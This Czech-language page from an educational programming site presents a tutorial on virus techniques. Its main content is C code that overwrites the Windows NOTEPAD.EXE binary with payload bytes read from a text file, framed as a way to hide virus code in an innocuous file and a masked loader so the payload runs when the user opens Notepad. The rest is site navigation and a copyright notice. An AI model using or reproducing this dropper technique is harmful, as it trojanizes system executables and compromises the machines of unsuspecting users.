www.amapro.cz & David Bazala [Programování]

Otevře webové stránky AmaPro


Otevře hlavní stránku společnosti AmaPro
Internetové stránky určené pro studenty středních a vysokých odborných škol.


amapro.cz/odkazy Projekt eliminuje vyhledávání klíčových slov na komerčních stránkách a v e-schopech.Nový projekt AmaPro

Nakopírování virového kódu na disk do exe souboru

Tato část řeší přenos obsahu zdrojového kódu v tzv. netečném souboru, jehož průchod a kontrola by musela být dříve již vyžádána. Zdrojová data viru lze umístit např. do klasického *.txt souboru nebo podobného. Po aktivaci zavaděče viru, který musí být přirozeně maskován je na PC téměř vymalováno, resp. to záleží na kódu viru. Tento případ zmodifikuje soubor NOTEPAD.EXE za simulaci viru. Vyvolání otevření poznámkového bloku je již otázkou velmi malého času práce uživatele.

//---------------------------------------------------------------
// zkopírování a uložení parazitního souboru
//---------------------------------------------------------------
int ukSoubor1; //proměnná pro identifikaci čísla otevřeného souboru
int ukSoubor2; //proměnná pro identifikaci čísla otevřeného souboru
int delka; //pomocná proměnná typu int
char *pole; //ukazatel na pomocné místo v paměti
ukSoubor1 = FileCreate("C:\\windows\\NOTEPAD.EXE"); //vytvoření nového souboru
ukSoubor2=FileOpen("data.txt",fmOpenRead); //otevření existujícího souboru
if(ukSoubor2==-1) //pokud se nepodařilo soubor otevřít
MessageBox(Handle,"Nelze otevřít soubor s informacemi. Uložte do jednoho adresáře","CHYBA",MB_OK);
delka = FileSeek(ukSoubor2,0,2); //vrací délku otevřeného souboru
FileSeek(ukSoubor2,0,0); //nastavuje ukazovátko na začátek souboru
pole = new char[delka+1]; //dynamicky alokuje místo v paměti pro data v souboru
FileRead(ukSoubor2, pole, delka); //načte soubor2 do paměti pole
FileWrite(ukSoubor1, pole, delka); //zapíše paměť pole do souboru1
FileClose(ukSoubor2); //zavírá soubor2
FileClose(ukSoubor1); //zavírá soubor1
delete [] pole; //uvolňuje dynamickou paměť

Program pracuje se dvěma soubory, jeden nově vytvoří s názvem "NOTEPAD.EXE" a to s tím, že stávající windowsácký smaže. Druhý soubor je otevřen náš existující "data.txt", který musí být ve stejném adresáři jako tento kód. Následně je zjištěná délka dat v souboru a alokované dynamické pole char. Načtení dat se zdrojového pole je následně zapsáno do cílového souboru. Po uzavření souborů jsou data zapsána na disk. Pole je uvolněno.

Abecední seznam všech článků Vyhledání pojmů ve článcích
Mikroprocesory IV.
Varianty návrhu číslicových řídících systémů realizovaných jako sekvenční obvody.
programovani/procesory_4
Animované obrázky
Animované gify a malé obrázky pro všeobecné využití.
datove_zdroje/animace
Řetězce PHP
Informace o chování řetězců v programování PHP.
php/obsah_php_string.php
OnLine televize
Seznam světových on line televizních vysílání
internet/katalog_internetove_televize
Popis HTML formátu
Velikost textu, barva textu, rozvržení stránky, obrázky, barva pozadí se zapisuje pomocí HTML příkazů.
stranky/html_tag
JavaScript - ukázky
Příklady užití některých často používaných efektů na stránky.
katalogy/javascript
Databáze obrázků
Malé a velké obrázky, podlkady, tlačítka, okrasné čáry a pod.
datove_zdroje/obrazky
Popis jazaka C
Průvodce příkazy programovacího jazyka C.
programovani/jazyk_c
Databáze ikon
Ikony a malé obrázky pro tlačítka či jiné použití
datove_zdroje/icony/icony.php
Otevře stránky Fulltextové vyhledávání na celém serveru
Digitalizované odborné knihy
Velká encyklopedie pojmů a zkratek
Česko - anglicko - německý technický slovník
Klasický katalog firem, služeb a stránek
OnLine překladač  vět a textů (nepoužívá Google)
Stránky pro chvíle oddechu od studia, relaxace
Katalog českých firem dle technologií
Internetový odkazník
Otevře hlavní stranu pro oddíl programování
 Wikipedie   Seznam stránek   Kapitoly témat   Významné servery   Klíčová slova 
Otevře hlavní stranu společnosti AmaPro

Všechna práva vyhrazena. Určeno jen pro osobní využití. Bez předchozího písemného souhlasu správce www.amapro.cz je zakázána jakákoli další publikace, přetištění nebo distribuce jakéhokoli materiálu nebo části materiálu zveřejněného na www.amapro.cz a to včetně šíření prostřednictvím elektronické pošty. Články, jejichž přímým autorem není amapro.cz lze publikovat pouze se souhlasem jejich majitelů či administrátoru příslušného webu.